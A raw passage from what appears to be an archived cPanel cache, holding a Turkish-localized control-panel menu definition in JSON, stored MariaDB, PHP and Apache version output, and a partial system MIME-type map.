Backups","type":"image"},{"url":"jetbackup/index.html#!/queues","group":"jetbackup","searchtext":"Queue","description":"Queue","base64_png_image":"","feature":"jetbackupqueue","onclick":"","height":"48","imgtype":"icon","type":"image","plainitemdesc":"Queue","target":"","file":"jetbackupqueue","subtype":"img","acontent":"","itemdesc":"Queue","width":"48","itemorder":"8"},{"feature":"jetbackupsnapshots","onclick":"","height":"48","searchtext":"Snapshots","description":"Snapshots","base64_png_image":"","url":"jetbackup/index.html#!/snapshots","group":"jetbackup","acontent":"","subtype":"img","itemdesc":"Snapshots","width":"48","itemorder":"9","file":"jetbackupsnapshots","type":"image","plainitemdesc":"Snapshots","target":"","imgtype":"icon"},{"file":"jetbackupgdpr","subtype":"img","acontent":"","width":"48","itemdesc":"GDPR Compliance","itemorder":"10","imgtype":"icon","type":"image","plainitemdesc":"GDPR Compliance","target":"","description":"GDPR Compliance","searchtext":"GDPR Compliance","base64_png_image":"","feature":"jetbackupgdpr","onclick":"","height":"48","url":"jetbackup/index.html#!/gdpr","group":"jetbackup"},{"description":"Ayarlar","searchtext":"Ayarlar","base64_png_image":"","feature":"jetbackupsettings","onclick":"","height":"48","url":"jetbackup/index.html#!/settings","group":"jetbackup","file":"jetbackupsettings","subtype":"img","acontent":"","width":"48","itemdesc":"Ayarlar","itemorder":"11","imgtype":"icon","type":"image","target":"","plainitemdesc":"Settings"}]},{"items":[{"imgtype":"icon","if":"$SERVICEPROVIDED{'mysql'}","type":"image","plainitemdesc":"phpMyAdmin","target":"phpmyadmin","file":"php_my_admin","subtype":"img","acontent":"target=\"phpmyadmin\"","itemdesc":"phpMyAdmin","width":"48","itemorder":"1","implements":"Database_phpMyAdmin","url":"sql/PhpMyAdmin.html","group":"databases","description":"Manage MySQL® databases.","searchtext":"phpMyAdmin database db","key":"php_my_admin","base64_png_image":"","feature":"phpmyadmin","onclick":"","height":"48"},{"key":"mysql_databases","searchtext":"MySQL Databases db MySQL® Veritabanları","description":"Create, manage, and delete MySQL® databases and database users.","base64_png_image":"","onclick":"","feature":"mysql","height":"48","implements":"Database_MySQL","url":"sql/index.html","group":"databases","file":"mysql_databases","subtype":"img","acontent":"","itemorder":"2","width":"48","itemdesc":"MySQL® Veritabanları","imgtype":"icon","type":"image","if":"$SERVICEPROVIDED{'mysql'}","plainitemdesc":"MySQL® Databases","target":""},{"file":"mysql_database_wizard","itemorder":"3","itemdesc":"MySQL® Veritabanı Sihirbazı","width":"48","subtype":"img","acontent":"","imgtype":"icon","plainitemdesc":"MySQL® Database Wizard","target":"","type":"image","if":"$SERVICEPROVIDED{'mysql'}","base64_png_image":"","key":"mysql_database_wizard","description":"Guided setup of a MySQL® database, database users, and user privileges.","searchtext":"MySQL Database Wizard mysql database db MySQL® Veritabanı Sihirbazı","height":"48","onclick":"","feature":"mysql","group":"databases","url":"sql/wizard1.html"},{"file":"remote_mysql","subtype":"img","acontent":"","itemorder":"4","itemdesc":"Uzak MySQL®","width":"48","imgtype":"icon","type":"image","if":"$SERVICEPROVIDED{'mysql'}","plainitemdesc":"Remote MySQL®","target":"","key":"remote_mysql","description":"Allow remote hosts (servers) to access MySQL® databases.","searchtext":"Remote MySQL db Uzak MySQL®","base64_png_image":"","onclick":"","feature":"mysql","height":"48","url":"sql/managehost.html","group":"databases"}],"group":"databases","desc":"Veritabanları"},{"items":[{"plainitemdesc":"Password [output,amp] Security","target":"","type":"image","imgtype":"icon","itemorder":"1","width":"48","itemdesc":"Şifre & Güvenliği","acontent":"","subtype":"img","file":"change_password","group":"preferences","url":"passwd/index.html","implements":"Password_Change","height":"48","onclick":"","feature":"password","base64_png_image":"","key":"change_password","description":"Update your cPanel account’s password.","searchtext":"password & security change facebook external google secure cpanel Şifre & Güvenliği"},{"type":"image","plainitemdesc":"Change Language","target":"","imgtype":"icon","acontent":"","subtype":"img","itemorder":"2","itemdesc":"Dili Değiştir","width":"48","file":"change_language","url":"setlang/index.html","group":"preferences","implements":"Locale_Change","onclick":"","feature":"setlang","height":"48","key":"change_language","searchtext":"dil setlang Dili Değiştir","description":"Change your default language.","base64_png_image":""},{"file":"contact_information","acontent":"","subtype":"img","itemorder":"3","width":"48","itemdesc":"İletişim Bilgileri","imgtype":"icon","type":"image","plainitemdesc":"Contact Information","target":"","key":"contact_information","description":"Set contact information and preferences.","searchtext":"iletişim e-posta İletişim Bilgileri","base64_png_image":"","onclick":"","feature":"updatenotificationprefs || updatecontact","height":"48","implements":"ContactInfo_Change","url":"contact/index.html","group":"preferences"},{"width":"48","itemdesc":"Kullanıcı Yöneticisi","itemorder":"4","acontent":"","subtype":"img","file":"user_manager","target":"","plainitemdesc":"User Manager","type":"image","if":"$HASROLE{'FTP'} || $HASROLE{'WebDisk'}","imgtype":"icon","height":"48","feature":"user_manager","onclick":"","base64_png_image":"","description":"Manage the users who can access various systems on your cPanel account.","searchtext":"şifre değişikliği ftp e-posta webdisk webdav hizmet Kullanıcı Yöneticisi","key":"user_manager","group":"preferences","url":"user_manager/index.html"}],"group":"preferences","desc":"Tercihler"},{"desc":"Etki Alanları","items":[{"acontent":"","subtype":"img","itemorder":"1","width":"48","itemdesc":"Site Yayımlayıcısı","file":"site_publisher","type":"image","if":"$HASROLE{'WebServer'}","plainitemdesc":"Site Publisher","target":"","imgtype":"icon","onclick":"","feature":"sitepublisher","height":"48","key":"site_publisher","searchtext":"site yayımlayıcı oluşturucu web sitesi oluşturucusunu başlat şablon Site Yayımlayıcısı","description":"Create a simple website as a placeholder.","base64_png_image":"","url":"site_publisher/index.html","group":"domains"},{"implements":"Domains_domains","url":"domains/index.html","group":"domains","searchtext":"domains parked park aliases alias addon subdomain domain force https redirect Etki Alanları","description":"Create, manage, and delete multiple domains.","key":"domains","base64_png_image":"","feature":"addondomains || subdomains || parkeddomains || sslinstall","onclick":"","imagetype":"icon","height":"48","type":"image","target":"","plainitemdesc":"Domains","file":"domains","acontent":"","subtype":"img","itemdesc":"Etki Alanları","width":"48","itemorder":"2"},{"onclick":"","feature":"redirects","height":"48","key":"redirects","description":"Send the visitors of a domain or particular page to a different URL.","searchtext":"Yeniden yönlendirmeler yeniden yaz mod yeniden yaz","base64_png_image":"","url":"mime/redirect.html","group":"domains","subtype":"img","acontent":"","itemorder":"6","itemdesc":"Yeniden yönlendirmeler","width":"48","file":"redirects","if":"$HASROLE{'WebServer'}","type":"image","plainitemdesc":"Redirects","target":"","imgtype":"icon"},{"file":"zone_editor","subtype":"img","acontent":"","width":"48","itemdesc":"Zone Editor","itemorder":"6","imgtype":"icon","if":"$HASROLE{'DNS'}","type":"image","plainitemdesc":"Zone Editor","target":"","searchtext":"zone editor advanced simple caa cname a aaaa txt dkim dmarc spf mx srv record dns dnssec Zone Editor","description":"Create, manage, and delete DNS zone records.","key":"zone_editor","base64_png_image":"","feature":"simplezoneedit || changemx || zoneedit","onclick":"","height":"48","url":"zone_editor/index.html","group":"domains"},{"url":"dynamic-dns/index.html","group":"domains","key":"dynamic_dns","description":"Manage your dynamic DNS domains.","searchtext":"dynamic dns ddns ip subdomain Dynamic DNS","base64_png_image":"","onclick":"","feature":"dynamicdns","height":48,"imgtype":"icon","if":"$HASROLE{'DNS'}","type":"image","plainitemdesc":"Dynamic DNS","target":"","file":"dynamic_dns","subtype":"img","acontent":"","itemorder":9,"width":48,"itemdesc":"Dynamic DNS"}],"group":"domains"},{"items":[{"file":"email_accounts","subtype":"img","acontent":"","itemorder":"1","width":"48","itemdesc":"E-posta Hesapları","imgtype":"icon","if":"$HASROLE{'MailReceive'}","type":"image","target":"","plainitemdesc":"Email Accounts","key":"email_accounts","description":"Create, manage, and delete email accounts.","searchtext":"e-posta hesapları posta pop imap smtp E-posta Hesapları","base64_png_image":"","onclick":"","feature":"popaccts","height":"48","implements":"Email_Accounts","url":"email_accounts/index.html","group":"email"},{"url":"mail/fwds.html","group":"email","implements":"Email_Forwarders","onclick":"","feature":"forwarders || emaildomainfwd","height":"48","key":"forwarders","searchtext":"İleticiler ilet","description":"Configure an email address to forward copies of incoming emails to another address.","base64_png_image":"","type":"image","if":"$HASROLE{'MailReceive'} && $HASROLE{'MailSend'}","plainitemdesc":"Forwarders","target":"","imgtype":"icon","subtype":"img","acontent":"","itemorder":"3","itemdesc":"İleticiler","width":"48","file":"forwarders"},{"imgtype":"icon","type":"image","if":"$HASROLE{'MailReceive'} && !$HASCHILDNODE{Mail}","plainitemdesc":"Email Routing","target":"","file":"email_routing","subtype":"img","acontent":"","itemorder":"4","width":"48","itemdesc":"E-posta Yönlendirmesi","implements":"Email_Routing","url":"mail/email_routing.html","group":"email","key":"email_routing","searchtext":"MX Entry Email Routing dns E-posta Yönlendirmesi","description":"Configure how the system routes a domain’s incoming mail.","base64_png_image":"","onclick":"","feature":"changemx","height":"48"},{"subtype":"img","acontent":"","itemorder":"5","width":"48","itemdesc":"Otomatik Yanıtlayıcılar","file":"autoresponders","type":"image","if":"$HASROLE{'MailReceive'} && $HASROLE{'MailSend'}","plainitemdesc":"Autoresponders","target":"","imgtype":"icon","onclick":"","feature":"autoresponders","height":"48","key":"autoresponders","searchtext":"Otomatik Yanıtlayıcılar otomatik yanıtlayıcı otomatik yanıtlayıcılar","description":"Configure automatic email response messages.","base64_png_image":"","url":"mail/autores.html","group":"email","implements":"Email_AutoResponders"},{"implements":"Email_DefaultAddress","group":"email","url":"mail/def.html","base64_png_image":"","description":"Set up a default email address.","searchtext":"Varsayılan Adres","key":"default_address","height":"48","feature":"defaultaddress","onclick":"","imgtype":"icon","target":"","plainitemdesc":"Default Address","if":"$HASROLE{'MailReceive'}","type":"image","file":"default_address","itemdesc":"Varsayılan Adres","width":"48","itemorder":"6","subtype":"img","acontent":""},{"implements":"Email_DeliveryReport","group":"email","url":"mail/route.html","base64_png_image":"","searchtext":"İletilen E-postayı İzle, E-postayı İzle, posta iletim raporu Gönderimi İzle","description":"Display reports about email message delivery attempts.","key":"track_delivery","height":"48","feature":"emailtrace","onclick":"","imgtype":"icon","target":"","plainitemdesc":"Track Delivery","type":"image","if":"$HASROLE{'MailReceive'} && $HASROLE{'MailSend'}","file":"track_delivery","itemdesc":"Gönderimi İzle","width":"48","itemorder":"8","subtype":"img","acontent":""},{"width":"48","itemdesc":"Genel E-posta Filtreleri","itemorder":"9","acontent":"","subtype":"img","file":"global_email_filters","plainitemdesc":"Global Email Filters","target":"","type":"image","if":"$HASROLE{'MailReceive'}","imgtype":"icon","height":"48","feature":"blockers","onclick":"","base64_png_image":"","description":"Configure how your server filters all of the email that your domains’ email accounts receive.","searchtext":"Genel E-Posta Filtreleri filtre hesap seviyesi filtreleme Genel E-posta Filtreleri","key":"global_email_filters","group":"email","url":"mail/filters/userfilters.html","implements":"Email_AccountLevelFiltering"},{"url":"mail/filters/managefilters.html","group":"email","implements":"Email_UserLevelFiltering","feature":"blockers","onclick":"","height":"48","searchtext":"Kullanıcı Filtreleri E-posta kullanıcı düzeyi Filtreleme filtre E-posta Filtreleri","description":"Configure how your server filters a specific email account’s received mail.","key":"email_filters","base64_png_image":"","type":"image","if":"$HASROLE{'MailReceive'}","plainitemdesc":"Email Filters","target":"","imgtype":"icon","subtype":"img","acontent":"","width":"48","itemdesc":"E-posta Filtreleri","itemorder":"10","file":"email_filters"},{"file":"email_deliverability","subtype":"img","acontent":"","itemorder":"11","itemdesc":"Email Deliverability","width":"48","imgtype":"icon","if":"$HASROLE{'MailSend'}","type":"image","plainitemdesc":"Email Deliverability","target":"","key":"email_deliverability","searchtext":"email Authentication Email Deliverability spf domain-keys authentication DKIM","description":"Identify problems with your mail-related DNS records for one or more of your domains.","base64_png_image":"","onclick":"","feature":"emailauth","height":"48","implements":"Email_Authentication","url":"email_deliverability/","group":"email"},{"url":"mail/csvimport.html","group":"email","onclick":"","feature":"csvimport","height":"48","key":"address_importer","searchtext":"Adres Aktarıcısı Adresleri Aktar İleticiler Posta csv aktar xls aktar","description":"Use a spreadsheet or comma-separated value text file to quickly create mailboxes or forwarders.","base64_png_image":"","type":"image","if":"$HASROLE{'MailReceive'}","plainitemdesc":"Address Importer","target":"","imgtype":"icon","subtype":"img","acontent":"","itemorder":"12","width":"48","itemdesc":"Adres Aktarıcısı","file":"address_importer"},{"url":"gpg/index.html","group":"email","onclick":"","feature":"pgp","height":"48","key":"encryption","searchtext":"Şifreleme gpg anahtarları GnuPG Anahtarları","description":"Create, manage, and delete GnuPG keys.","base64_png_image":"","type":"image","if":"$HASROLE{'MailReceive'}","plainitemdesc":"Encryption","target":"","imgtype":"icon","acontent":"","subtype":"img","itemorder":"15","itemdesc":"Şifreleme","width":"48","file":"encryption"},{"group":"email","url":"mail/manage_disk_usage/","implements":"Email_Disk_Usage","height":"48","onclick":"","feature":"popaccts && email_disk_usage","base64_png_image":"","key":"email_disk_usage","description":"View your mailboxes and disk usage for each, and remove old or large messages.","searchtext":"email accounts mail disk usage bytes mb size Email Disk Usage","target":"","plainitemdesc":"Email Disk Usage","if":"$HASROLE{'MailReceive'}","type":"image","imgtype":"icon","itemorder":"19","itemdesc":"Email Disk Usage","width":"48","subtype":"img","acontent":"","file":"email_disk_usage"},{"base64_png_image":"","searchtext":"MailScanner","description":"MailScanner","height":"48","onclick":"","feature":"mailscanner","group":"email","url":"mailscanner/index.html","file":"mailscanner","itemorder":"999","itemdesc":"MailScanner","width":"48","subtype":"img","acontent":"","imgtype":"icon","plainitemdesc":"MailScanner","target":"","type":"image"}],"group":"email","desc":"E-posta"},{"group":"software","items":[{"plainitemdesc":"WordPress Manager by OdeaWeb Kurulum Aracı","target":"","type":"image","imgtype":"icon","itemdesc":"WordPress Manager by OdeaWeb Kurulum Aracı","width":"48","itemorder":"1","acontent":"","subtype":"img","file":"wp_softaculous","group":"software","url":"softaculous/index.live.php?act=wordpress","implements":"Softaculous_WordPress","height":"48","feature":"wp_softaculous","onclick":"","base64_png_image":"","description":"WordPress Manager by OdeaWeb Kurulum Aracı","searchtext":"WordPress Manager by OdeaWeb Kurulum Aracı"},{"target":"","plainitemdesc":"Site Software","type":"image","if":"$HASROLE{'WebServer'}","imgtype":"icon","cpanel_os_check":"supports_cpaddons=1","width":"32","itemdesc":"Site Yazılımı","itemorder":"6","file_check":"!/var/cpanel/cpaddons.disabled","subtype":"img","acontent":"","file":"site_software","group":"software","url":"addoncgi/cpaddons.html","implements":"Site_Software","height":"32","feature":"addoncgi","onclick":"","base64_png_image":"","searchtext":"Site Yazılımı eklentiler yazılım","description":"Update, manage, and uninstall cPAddons.","key":"site_software"},{"imgtype":"icon","if":"$hasmoddeflate","type":"image","target":"","plainitemdesc":"Optimize Website","file":"optimize_website","acontent":"","subtype":"img","itemorder":"7","itemdesc":"Web Sitesini Optimize Edin","width":"32","url":"optimize/index.html","group":"software","key":"optimize_website","searchtext":"Web Sitesini Optimize Edin","description":"Configure your server to automatically compress specified types of content when visitors access that content.","base64_png_image":"","onclick":"","feature":"optimizews","height":"32"},{"file":"multiphp_manager","itemorder":"8","width":"48","itemdesc":"MultiPHP Yöneticisi","acontent":"","subtype":"img","imgtype":"icon","target":"","plainitemdesc":"MultiPHP Manager","type":"image","if":"$is_ea4","base64_png_image":"","key":"multiphp_manager","searchtext":"MultiPHP Yöneticisi","description":"Manage your PHP configuration.","height":"48","onclick":"","feature":"multiphp","group":"software","url":"multiphp_manager/index.html"},{"feature":"multiphp_ini_editor","onclick":"","height":"48","searchtext":"MultiPHP INI Düzenleyicisi PHP yapılandırması","description":"Configure your website’s PHP settings.","key":"multiphp_ini_editor","base64_png_image":"","url":"multiphp_ini_editor/index.html","group":"software","acontent":"","subtype":"img","itemdesc":"MultiPHP INI Düzenleyicisi","width":"48","itemorder":"9","file":"multiphp_ini_editor","if":"$is_ea4","type":"image","target":"","plainitemdesc":"MultiPHP INI Editor","imgtype":"icon"},{"url":"softaculous/index.live.php","group":"software","implements":"Softaculous_Home","feature":"softaculous","onclick":"","height":"48","searchtext":"Softaculous Apps Installer","description":"Softaculous Apps Installer","base64_png_image":"","type":"image","plainitemdesc":"Softaculous Apps Installer","target":"","imgtype":"icon","acontent":"","subtype":"img","itemdesc":"Softaculous Apps Installer","width":"48","itemorder":"99","file":"softaculous"}],"desc":"Yazılım"},{"items":[{"height":"48","onclick":"","feature":"soft_div_icons","base64_png_image":"","searchtext":"Softaculous Apps Installer","description":"Softaculous Apps Installer","group":"soft_div","url":"softaculous/index.live.php","itemorder":"10","width":"48","itemdesc":"Softaculous Apps Installer","subtype":"img","acontent":"","file":"soft_div_icons","target":"","plainitemdesc":"Softaculous Apps Installer","type":"image","imgtype":"icon"}],"group":"soft_div","desc":"Softaculous Apps Installer"}],"needs_security_token":{"web_host_manager":1},"default_group_order":{"software":6,"email":1,"whmcs":1,"sample_apps":9,"domains":4,"metrics":5,"files":2,"jetbackup":1,"advanced":7,"soft_div":10,"databases":3,"preferences":8,"security":6},"implements":{"Email_UserLevelFiltering":"email_filters","API_Tokens_Manager":"api_tokens","Password_Change":"change_password","ContactInfo_Change":"contact_information","Email_Accounts":"email_accounts","SSL_TLS_Status":"tls_status","Database_MySQL":"mysql_databases","Cron_Home":"cron_jobs","Email_AutoResponders":"autoresponders","SSL_TLS_Manager":"ssl_tls","Email_AccountLevelFiltering":"global_email_filters","Email_DeliveryReport":"track_delivery","Locale_Change":"change_language","Softaculous_Home":"softaculous","Email_Routing":"email_routing","Email_Authentication":"email_deliverability","Email_Forwarders":"forwarders","Email_DefaultAddress":"default_address","Site_Software":"site_software","Stats_AWStats":"awstats","FileManager_Home":"file_manager","Domains_domains":"domains","Softaculous_WordPress":"wp_softaculous","Backups_Home":"backup","Email_Disk_Usage":"email_disk_usage","Database_phpMyAdmin":"php_my_admin"}} datastore/Cpanel::MysqlRun::running 0000600 00000000035 15025306755 0013341 0 ustar 00 {"version":"10.3.39-MariaDB"} datastore/_opt_cpanel_ea-php81_root_usr_bin_php_-n_-v 0000600 00000000206 15025306755 0016770 0 ustar 00 PHP 8.1.30 (cli) (built: Oct 2 2024 15:35:04) (NTS)
Copyright (c) The PHP Group
Zend Engine v4.1.30, Copyright (c) Zend Technologies
datastore/_usr_sbin_httpd_-l 0000600 00000000067 15025306755 0012236 0 ustar 00 Compiled in modules:
core.c
mod_so.c
http_core.c
datastore/SYSTEMMIME 0000600 00000066431 15025306755 0010163 0 ustar 00 {"application/vnd.kde.kspread":"ksp","application/vnd.genomatix.tuxedo":"txd","application/tei+xml":"tei teicorpus","image/vnd.net-fpx":"npx","application/vnd.cosmocaller":"cmc","application/vnd.dece.unspecified":"uvvx uvx","application/vnd.stardivision.writer-global":"sgl","chemical/x-cif":"cif","image/x-xbitmap":"xbm","audio/mp4":"m4a m4p mp4 mp4a","application/sru+xml":"sru","application/x-httpd-ea-php74":"php php7","application/scvp-vp-response":"spp","application/mads+xml":"mads","application/x-sh":"sh","application/vnd.fujitsu.oasys":"oas","application/srgs":"gram","application/vnd.kde.karbon":"karbon","application/davmount+xml":"davmount","application/vnd.shana.informed.formdata":"ifm","application/x-msaccess":"mdb","video/vnd.mpegurl":"m4u mxu","application/x-dtbook+xml":"dtb","video/h263":"h263","image/cgm":"cgm","text/vnd.fly":"fly","application/vnd.ms-officetheme":"thmx","application/x-install-instructions":"install","application/vnd.oasis.opendocument.text-master":"odm","application/smil+xml":"smi smil","application/xaml+xml":"xaml","application/atomcat+xml":"atomcat","application/emma+xml":"emma","application/vnd.wap.wbxml":"wbxml","application/vnd.dece.ttml+xml":"uvt uvvt","application/rss+xml":"rss","application/vnd.igloader":"igl","application/vnd.ms-powerpoint.template.macroenabled.12":"potm","application/vnd.oasis.opendocument.chart":"odc","audio/ogg":"oga ogg spx","application/vnd.xara":"xar","application/vnd.realvnc.bed":"bed","application/pkix-cert":"cer","application/x-msschedule":"scd","application/vnd.vsf":"vsf","text/vnd.sun.j2me.app-descriptor":"jad","application/x-chat":"chat","application/pkixcmp":"pki","application/ruby":"rb","application/metalink4+xml":"meta4","application/vnd.astraea-software.iota":"iota","application/msword":"doc dot","application/x-authorware-map":"aam","application/vnd.neurolanguage.nlu":"nlu","text/x-sfv":"sfv","image/ief":"ief","application/vnd.oasis.opendocument.text-template":"ott","image/vnd.dvb.subtitle":"sub","audio/vnd.nuera.ecelp4800":"ecelp4800","application/vnd.bmi":"bmi","application/vnd.blueice.multipass":"mpm","application/vnd.las.las+xml":"lasxml","application/vnd.powerbuilder6":"pbd","application/marcxml+xml":"mrcx","application/vnd.hp-hpgl":"hpgl","application/x-envoy":"evy","application/vnd.jam":"jam","application/octet-stream":"bin bpk deploy dist distz dmg dms dump elc iso lrf mar pkg so","image/webp":"webp","application/vnd.yamaha.hv-voice":"hvp","application/vnd.google-earth.kmz":"kmz","application/vnd.dece.zip":"uvvz uvz","application/xop+xml":"xop","application/x-tgif":"obj","text/tab-separated-values":"tsv","application/x-img":"img","application/vnd.sailingtracker.track":"st","application/x-abiword":"abw","application/vnd.xfdl":"xfdl","application/vnd.chipnuts.karaoke-mmd":"mmd","application/vnd.openxmlformats-officedocument.presentationml.presentation":"pptx","application/x-research-info-systems":"ris","application/vnd.ms-lrm":"lrm","application/vnd.claymore":"cla","text/vnd.curl.mcurl":"mcurl","video/x-ms-wmv":"wmv","image/vnd.wap.wbmp":".wbmp wbmp","application/vnd.zzazz.deck+xml":"zaz","image/x-portable-bitmap":"pbm","video/x-ms-asf":"asf asx","application/cdmi-capability":"cdmia","application/vnd.simtech-mindmapper":"twd twds","video/h261":"h261","video/vnd.dece.pd":"uvp uvvp","application/vnd.frogans.fnc":"fnc","application/inkml+xml":"ink inkml","image/x-mrsid-image":"sid","application/vnd.stepmania.stepchart":"sm","application/x-ms-shortcut":"lnk","application/vnd.mseq":"mseq","application/vnd.fsc.weblaunch":"fsc","application/vnd.isac.fcs":"fcs","application/vnd.pg.osasli":"ei6","text/x-c":"c cc cpp cxx dic h hh","application/vnd.intergeo":"i2g","text/x-vcalendar":"vcs","application/vnd.oasis.opendocument.image-template":"oti","application/vnd.mobius.plc":"plc","application/vnd.dece.data":"uvd uvf uvvd uvvf","application/vnd.commonspace":"csp","application/x-ms-xbap":"xbap","application/xhtml+xml":"xht xhtml","application/x-gzip":".gz .tgz tgz","image/vnd.djvu":"djv djvu","application/vnd.visio":"vsd vss vst vsw","application/vnd.mobius.msl":"msl","application/vnd.oasis.opendocument.presentation":"odp","image/x-pcx":"pcx","video/x-ms-wm":"wm","application/x-bittorrent":"torrent","video/x-mng":"mng","application/x-t3vm-image":"t3","application/x-font-bdf":"bdf","application/vnd.openxmlformats-officedocument.spreadsheetml.sheet":"xlsx","application/mods+xml":"mods","application/vnd.ms-excel.addin.macroenabled.12":"xlam","application/vnd.sun.xml.draw":"sxd","text/vnd.curl.scurl":"scurl","application/vnd.groove-help":"ghf","application/x-msdownload":"bat com dll exe msi","application/vnd.mif":"mif","application/x-silverlight-app":"xap","application/vnd.cups-ppd":"ppd","application/vnd.pawaafile":"paw","text/turtle":"ttl","application/prs.cww":"cww","image/x-3ds":"3ds","application/x-compress":".Z","image/x-cmx":"cmx","application/pgp-encrypted":"pgp","application/x-lzh-compressed":"lha lzh","application/vnd.hydrostatix.sof-data":"sfd-hdstx","image/x-portable-anymap":"pnm","image/x-freehand":"fh fh4 fh5 fh7 fhc","application/vnd.groove-vcard":"vcg","chemical/x-cml":"cml","application/vnd.osgi.subsystem":"esa","audio/vnd.dra":"dra","video/x-flv":"flv","application/vnd.jisp":"jisp","application/x-httpd-ea-php56":"php php5","application/vnd.stardivision.impress":"sdd","image/svg+xml":"svg svgz","audio/xm":"xm","application/vnd.ibm.minipay":"mpy","application/vnd.smaf":"mmf","application/vnd.tcpdump.pcap":"cap dmp pcap","application/x-conference":"nsc","application/vnd.sun.xml.draw.template":"std","chemical/x-xyz":"xyz","application/reginfo+xml":"rif","application/x-font-type1":"afm pfa pfb pfm","application/mp21":"m21 mp21","video/x-matroska":"mk3d mks mkv","application/shf+xml":"shf","application/vnd.rn-realmedia":"rm","application/vnd.yellowriver-custom-menu":"cmp","audio/x-ms-wma":"wma","application/sparql-query":"rq","application/xproc+xml":"xpl","application/java-archive":"jar","application/vnd.clonk.c4group":"c4d c4f c4g c4p c4u","audio/x-aac":"aac","image/x-pict":"pct pic","application/x-msbinder":"obd","text/x-nfo":"nfo","model/x3d+vrml":"x3dv x3dvz","application/vnd.americandynamics.acc":"acc","application/vnd.google-earth.kml+xml":"kml","application/vnd.syncml.dm+wbxml":"bdm","application/pkcs7-mime":"p7c p7m","application/vnd.apple.installer+xml":"mpkg","application/omdoc+xml":"omdoc","audio/webm":"weba","application/vnd.aristanetworks.swi":"swi","application/vnd.ms-fontobject":"eot","application/vnd.mfmp":"mfm","text/x-setext":"etx","application/patch-ops-error+xml":"xer","application/rpki-roa":"roa","application/xslt+xml":"xslt","application/x-shar":"shar","application/x-latex":"latex","application/vnd.medcalcdata":"mc1","application/x-java-jnlp-file":"jnlp","application/x-apple-diskimage":"dmg","font/woff":"woff","application/winhlp":"hlp","application/vnd.musician":"mus","application/x-sql":"sql","application/vnd.dart":"dart","video/x-smv":"smv","image/x-rgb":"rgb","application/x-x509-ca-cert":".crt crt der","application/vnd.ms-word.document.macroenabled.12":"docm","video/vnd.uvvu.mp4":"uvu uvvu","application/x-dtbresource+xml":"res","application/x-doom":"wad","application/vnd.openofficeorg.extension":"oxt","application/vnd.adobe.xfdf":"xfdf","application/x-cpio":"cpio","application/vnd.fujitsu.oasys2":"oa2","application/vnd.oasis.opendocument.graphics-template":"otg","application/x-httpd-ea-php54":"php php5","text/x-config":"cnf conf","application/pgp-signature":"asc sig","application/vnd.ibm.rights-management":"irm","application/x-httpd-php-source":"phps","application/vnd.kde.kontour":"kon","application/ogg":"ogx","application/vnd.novadigm.ext":"ext","application/vnd.syncml+xml":"xsm","application/x-freearc":"arc","image/vnd.fujixerox.edmics-mmr":"mmr","audio/x-flac":"flac","application/vnd.mophun.application":"mpn","application/x-msclip":"clp","application/x-mscardfile":"crd","application/thraud+xml":"tfi","application/vnd.fujixerox.docuworks.binder":"xbd","application/vnd.ahead.space":"ahead","text/x-asm":"asm s","application/x-xpinstall":"xpi","application/vnd.epson.salt":"slt","application/vnd.hhe.lesson-player":"les","application/vnd.geospace":"g3w","image/vnd.dxf":"dxf","application/vnd.ms-word.template.macroenabled.12":"dotm","application/vnd.dvb.service":"svc","application/vnd.stardivision.math":"smf","application/x-font-ghostscript":"gsf","application/xml-dtd":"dtd","text/x-sql":"sql","application/postscript":"ai eps ps","application/vnd.ms-excel.sheet.binary.macroenabled.12":"xlsb","application/vnd.olpc-sugar":"xo","application/vnd.lotus-wordpro":"lwp","video/vnd.fvt":"fvt","application/exi":"exi","application/vnd.sun.xml.calc":"sxc","application/vnd.ms-ims":"ims","application/rsd+xml":"rsd","application/x-cbr":"cb7 cba cbr cbt cbz","video/jpeg":"jpgv","application/x-authorware-seg":"aas","application/rpki-manifest":"mft","application/vnd.crick.clicker.wordbank":"clkw","image/vnd.dece.graphic":"uvg uvi uvvg uvvi","text/vcard":"vcard","application/vnd.recordare.musicxml":"mxl","video/3gpp":"3gp","audio/basic":"au snd","application/x-pkcs7-certreqresp":"p7r","audio/s3m":"s3m","application/vnd.sun.xml.writer.global":"sxg","application/vnd.symbian.install":"sis sisx","application/vnd.ipunplugged.rcprofile":"rcprofile","application/vnd.pocketlearn":"plf","text/x-registry":"reg","application/vnd.ctc-posml":"pml","application/vnd.oasis.opendocument.image":"odi","application/cu-seeme":"cu","application/vnd.cluetrust.cartomobile-config-pkg":"c11amz","application/x-cfs-compressed":"cfs","application/vnd.curl.pcurl":"pcurl","application/x-cdlink":"vcd","application/vnd.uiq.theme":"utz","audio/vnd.lucent.voice":"lvp","application/x-mobipocket-ebook":"mobi prc","text/vnd.curl":"curl","video/x-fli":"fli","application/vnd.novadigm.edm":"edm","application/vnd.ms-works":"wcm wdb wks wps","audio/x-mpegurl":"m3u","application/scvp-vp-request":"spq","application/relax-ng-compact-syntax":"rnc","image/gif":"gif","application/vnd.lotus-screencam":"scm","application/vnd.sun.xml.writer.template":"stw","application/vnd.shana.informed.formtemplate":"itp","chemical/x-cmdf":"cmdf","image/x-tga":"tga","application/vnd.ms-powerpoint.presentation.macroenabled.12":"pptm","application/vnd.fujitsu.oasysprs":"bh2","application/vnd.proteus.magazine":"mgz","application/vnd.stardivision.writer":"sdw vor","text/vnd.graphviz":"gv","application/vnd.airzip.filesecure.azf":"azf","application/xenc+xml":"xenc","video/3gpp2":"3g2","application/vnd.framemaker":"book fm frame maker","video/vnd.dece.mobile":"uvm uvvm","application/x-pkcs12":"p12 pfx","application/vnd.epson.quickanime":"qam","application/vnd.fujixerox.ddd":"ddd","application/vnd.trid.tpt":"tpt","video/mpeg":"m1v m2v mpe mpeg mpg","audio/x-ms-wax":"wax","application/resource-lists-diff+xml":"rld","application/vnd.noblenet-web":"nnw","application/vnd.immervision-ivp":"ivp","application/vnd.enliven":"nml","application/vnd.nokia.n-gage.data":"ngdat","application/vnd.adobe.formscentral.fcdt":"fcdt","application/vnd.ufdl":"ufd 